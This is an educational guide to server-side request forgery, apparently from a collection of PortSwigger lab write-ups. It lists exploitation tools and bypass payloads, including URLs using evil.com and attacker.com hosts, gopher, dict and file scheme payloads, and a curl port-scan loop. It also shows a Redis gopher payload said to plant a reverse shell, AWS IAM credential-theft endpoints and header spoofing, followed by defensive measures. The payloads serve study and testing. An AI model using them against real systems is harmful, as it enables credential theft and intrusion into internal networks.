Server-Side Request Forgery (SSRF) Vulnerability Guide

SSRF Diagram
Figure: SSRF attack flow demonstrating unauthorized internal network access

Introduction
Tools
Bypass Techniques
Exploitation Scenarios
HTTP Headers for SSRF
Defensive Measures
References

Introduction

Server-Side Request Forgery (SSRF) occurs when an attacker manipulates a vulnerable server to send crafted requests to internal or external systems on their behalf. It is commonly used to:

Access internal services behind firewalls
Extract metadata from cloud services (e.g., AWS, Azure, GCP)
Perform port scans or pivot attacks
Abuse trust boundaries

Tools

Tool	Description	Link
SSRFmap	Automated SSRF exploitation tool	GitHub
Gopherus	SSRF payload generator (Gopher, Redis, etc.)	GitHub
rbndr	DNS rebinding testing and SSRF vector tool	GitHub
Interactsh	Out-of-band (OOB) detection platform	GitHub

Bypass Techniques

1. URL Obfuscation

http://expected-host@evil.com/
http://evil.com:80@expected.com:80/

2. DNS Tricks

http://169.254.169.254.nip.io
http://metadata.google.internal.attacker.com
http://[::ffff:a9fe:a9fe]

3. Protocol Schemes

gopher://127.0.0.1:6379/_*2%0d%0a$4%0d%0aPING%0d%0a
dict://127.0.0.1:6379/INFO
file:///etc/passwd

4. Encoding Techniques

http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ
http://%6d%65%74%61%64%61%74%61%2e%67%6f%6f%67%6c%65%2e%69%6e%74%65%72%6e%61%6c

5. Cloud Metadata Endpoints

# AWS
http://169.254.169.254/latest/meta-data/

# GCP
http://metadata.google.internal/computeMetadata/v1/

# Azure
http://169.254.169.254/metadata/instance?api-version=2020-09-01

Exploitation Scenarios

1. Internal Service Port Scanning

for port in {1..65535}; do
    curl "http://vulnerable.com/fetch?url=http://127.0.0.1:$port" -m 1
done

2. Redis Unauthorized Command Injection

gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a...

Injects a reverse shell via Redis cron manipulation

3. AWS IAM Role Credential Theft

http://169.254.169.254/latest/meta-data/iam/security-credentials/

HTTP Headers for SSRF

In some SSRF scenarios, the server may derive internal request parameters from HTTP headers. Abuse these headers to influence server-side routing:

Common Headers That Can Trigger SSRF:

Host: Spoofed host override
X-Forwarded-For: Fakes source IP address
X-Forwarded-Host: Overrides backend target
X-Forwarded-Proto: Alters HTTP/HTTPS routing
Forwarded: RFC-compliant combination of forwarding headers
Referer: May influence behavior in redirection logic
Location: Can be abused for SSRF via open redirects

GET / HTTP/1.1
Host: internal.service
X-Forwarded-Host: 169.254.169.254
X-Forwarded-For: 127.0.0.1

Defensive Measures

1. Input Validation

Allowlist only specific hostnames and protocols
Reject all private/reserved IP ranges (RFC1918, 127.0.0.1, etc.)

2. Network Layer Filtering (Example: NGINX)

location /proxy {
    deny 10.0.0.0/8;
    deny 172.16.0.0/12;
    deny 192.168.0.0/16;
    deny 127.0.0.0/8;
    deny 169.254.0.0/16;
    proxy_pass $url;
}

3. Application Hardening

Disable unused URL schemes (gopher://, file://, etc.)
Normalize and parse URLs using secure libraries

4. Cloud-Specific Protections

Enforce AWS IMDSv2:

curl -X PUT "http://169.254.169.254/latest/api/token" \
  -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"

Block access to metadata IP ranges from within applications or WAFs

portswigger-all-labs

Complete PortSwigger Web Security Academy Lab Writeups Detailed, categorized solutions for every lab — from APPRENTICE to EXPERT — covering all 30 vulnerability types.